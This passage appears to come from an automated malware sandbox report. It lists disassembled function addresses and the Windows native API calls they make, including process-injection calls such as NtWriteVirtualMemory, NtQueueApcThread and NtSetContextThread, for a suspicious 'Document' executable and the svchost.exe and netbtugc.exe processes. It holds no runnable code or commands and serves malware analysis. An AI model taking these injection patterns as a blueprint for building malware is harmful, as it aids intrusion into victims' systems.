            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CF0 NtOpenProcess,2_2_03372CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CC0 NtQueryVirtualMemory,2_2_03372CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373010 NtOpenDirectoryObject,2_2_03373010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373090 NtSetValueKey,2_2_03373090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033739B0 NtGetContextThread,2_2_033739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D10 NtOpenProcessToken,2_2_03373D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D70 NtOpenThread,2_2_03373D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03434340 NtSetContextThread,LdrInitializeThunk,10_2_03434340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03434650 NtSuspendThread,LdrInitializeThunk,10_2_03434650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432B60 NtClose,LdrInitializeThunk,10_2_03432B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432BE0 NtQueryValueKey,LdrInitializeThunk,10_2_03432BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03432BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_03432BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432AD0 NtReadFile,LdrInitializeThunk,10_2_03432AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432AF0 NtWriteFile,LdrInitializeThunk,10_2_03432AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432F30 NtCreateSection,LdrInitializeThunk,10_2_03432F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432FE0 NtCreateFile,LdrInitializeThunk,10_2_03432FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432FB0 NtResumeThread,LdrInitializeThunk,10_2_03432FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03432EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_03432E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432D10 NtMapViewOfSection,LdrInitializeThunk,10_2_03432D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_03432D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432DD0 NtDelayExecution,LdrInitializeThunk,10_2_03432DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_03432DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432C60 NtCreateKey,LdrInitializeThunk,10_2_03432C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_03432C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_03432CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034335C0 NtCreateMutant,LdrInitializeThunk,10_2_034335C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034339B0 NtGetContextThread,LdrInitializeThunk,10_2_034339B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432B80 NtQueryInformationFile,10_2_03432B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432AB0 NtWaitForSingleObject,10_2_03432AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432F60 NtCreateProcessEx,10_2_03432F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432F90 NtProtectVirtualMemory,10_2_03432F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432FA0 NtQuerySection,10_2_03432FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432E30 NtWriteVirtualMemory,10_2_03432E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432EA0 NtAdjustPrivilegesToken,10_2_03432EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432D00 NtSetInformationFile,10_2_03432D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432DB0 NtEnumerateKey,10_2_03432DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432C00 NtQueryInformationProcess,10_2_03432C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432CC0 NtQueryVirtualMemory,10_2_03432CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03432CF0 NtOpenProcess,10_2_03432CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03433010 NtOpenDirectoryObject,10_2_03433010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03433090 NtSetValueKey,10_2_03433090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03433D70 NtOpenThread,10_2_03433D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03433D10 NtOpenProcessToken,10_2_03433D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C27A70 NtReadFile,10_2_02C27A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C27BE0 NtClose,10_2_02C27BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C27B50 NtDeleteFile,10_2_02C27B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C27920 NtCreateFile,10_2_02C27920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C27D30 NtAllocateVirtualMemory,10_2_02C27D30
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_009AD5EB
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009A1201
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009AE8F6
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B20460_2_009B2046
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009480600_2_00948060
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009A82980_2_009A8298
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0097E4FF0_2_0097E4FF
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0097676B0_2_0097676B
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009D48730_2_009D4873
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0096CAA00_2_0096CAA0
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0094CAF00_2_0094CAF0
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0095CC390_2_0095CC39
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00976DD90_2_00976DD9
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009491C00_2_009491C0
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0095B1190_2_0095B119
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009613940_2_00961394
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009617060_2_00961706
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0096781B0_2_0096781B
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009619B00_2_009619B0
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009479200_2_00947920
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0095997D0_2_0095997D
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00967A4A0_2_00967A4A
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00967CA70_2_00967CA7
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00961C770_2_00961C77
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00979EEE0_2_00979EEE
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009CBE440_2_009CBE44
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00961F320_2_00961F32
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_01BC36600_2_01BC3660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA3522_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034003E62_2_034003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F02_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E02742_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C02C02_2_033C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA1182_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033301002_2_03330100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C81582_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F41A22_2_033F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034001AA2_2_034001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F81CC2_2_033F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D20002_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033407702_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033647502_2_03364750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C02_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C6E02_2_0335C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033405352_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034005912_2_03400591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E44202_2_033E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F24462_2_033F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EE4F62_2_033EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB402_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F6BD72_2_033F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA802_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033569622_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A02_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340A9A62_2_0340A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334A8402_2_0334A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033428402_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033268B82_2_033268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E8F02_2_0336E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360F302_2_03360F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E2F302_2_033E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03382F282_2_03382F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4F402_2_033B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BEFA02_2_033BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334CFE02_2_0334CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332FC82_2_03332FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEE262_2_033FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340E592_2_03340E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352E902_2_03352E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FCE932_2_033FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEEDB2_2_033FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DCD1F2_2_033DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334AD002_2_0334AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03358DBF2_2_03358DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333ADE02_2_0333ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340C002_2_03340C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0CB52_2_033E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330CF22_2_03330CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D2_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C2_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A2_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A02_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C02_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B16B2_2_0340B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F1722_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337516C2_2_0337516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334B1B02_2_0334B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F70E92_2_033F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF0E02_2_033FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF0CC2_2_033EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C02_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF7B02_2_033FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033317EC2_2_033317EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033856302_2_03385630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F16CC2_2_033F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F75712_2_033F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034095C32_2_034095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DD5B02_2_033DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF43F2_2_033FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033314602_2_03331460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFB762_2_033FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FB802_2_0335FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B5BF02_2_033B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337DBF92_2_0337DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B3A6C2_2_033B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFA492_2_033FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7A462_2_033F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DDAAC2_2_033DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03385AA02_2_03385AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E1AA32_2_033E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EDAC62_2_033EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D59102_2_033D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033499502_2_03349950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B9502_2_0335B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD8002_2_033AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033438E02_2_033438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFF092_2_033FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFFB12_2_033FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341F922_2_03341F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03349EB02_2_03349EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7D732_2_033F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F1D5A2_2_033F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343D402_2_03343D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FDC02_2_0335FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B9C322_2_033B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFCF22_2_033FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BA35210_2_034BA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034C03E610_2_034C03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340E3F010_2_0340E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034A027410_2_034A0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034802C010_2_034802C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0348815810_2_03488158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033F010010_2_033F0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0349A11810_2_0349A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B81CC10_2_034B81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034C01AA10_2_034C01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B41A210_2_034B41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0349200010_2_03492000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0342475010_2_03424750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340077010_2_03400770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033FC7C010_2_033FC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0341C6E010_2_0341C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340053510_2_03400535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034C059110_2_034C0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B244610_2_034B2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034A442010_2_034A4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034AE4F610_2_034AE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BAB4010_2_034BAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B6BD710_2_034B6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033FEA8010_2_033FEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0341696210_2_03416962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034029A010_2_034029A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034CA9A610_2_034CA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340A84010_2_0340A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340284010_2_03402840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033E68B810_2_033E68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0342E8F010_2_0342E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03474F4010_2_03474F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03442F2810_2_03442F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03420F3010_2_03420F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034A2F3010_2_034A2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340CFE010_2_0340CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0347EFA010_2_0347EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033F2FC810_2_033F2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03400E5910_2_03400E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BEE2610_2_034BEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BEEDB10_2_034BEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03412E9010_2_03412E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BCE9310_2_034BCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340AD0010_2_0340AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0349CD1F10_2_0349CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033FADE010_2_033FADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03418DBF10_2_03418DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03400C0010_2_03400C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033F0CF210_2_033F0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034A0CB510_2_034A0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B132D10_2_034B132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033ED34C10_2_033ED34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0344739A10_2_0344739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0341B2C010_2_0341B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034A12ED10_2_034A12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034052A010_2_034052A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034CB16B10_2_034CB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0343516C10_2_0343516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033EF17210_2_033EF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340B1B010_2_0340B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034070C010_2_034070C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034AF0CC10_2_034AF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B70E910_2_034B70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BF0E010_2_034BF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033F17EC10_2_033F17EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BF7B010_2_034BF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0344563010_2_03445630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B16CC10_2_034B16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B757110_2_034B7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034C95C310_2_034C95C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0349D5B010_2_0349D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033F146010_2_033F1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BF43F10_2_034BF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BFB7610_2_034BFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03475BF010_2_03475BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0343DBF910_2_0343DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0341FB8010_2_0341FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BFA4910_2_034BFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B7A4610_2_034B7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03473A6C10_2_03473A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034ADAC610_2_034ADAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03445AA010_2_03445AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0349DAAC10_2_0349DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034A1AA310_2_034A1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0340995010_2_03409950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0341B95010_2_0341B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0349591010_2_03495910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0346D80010_2_0346D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034038E010_2_034038E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BFF0910_2_034BFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03401F9210_2_03401F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033C3FD510_2_033C3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_033C3FD210_2_033C3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034BFFB110_2_034BFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03409EB010_2_03409EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_03403D4010_2_03403D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B1D5A10_2_034B1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_034B7D7310_2_034B7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0341FDC010_2_0341FDC0
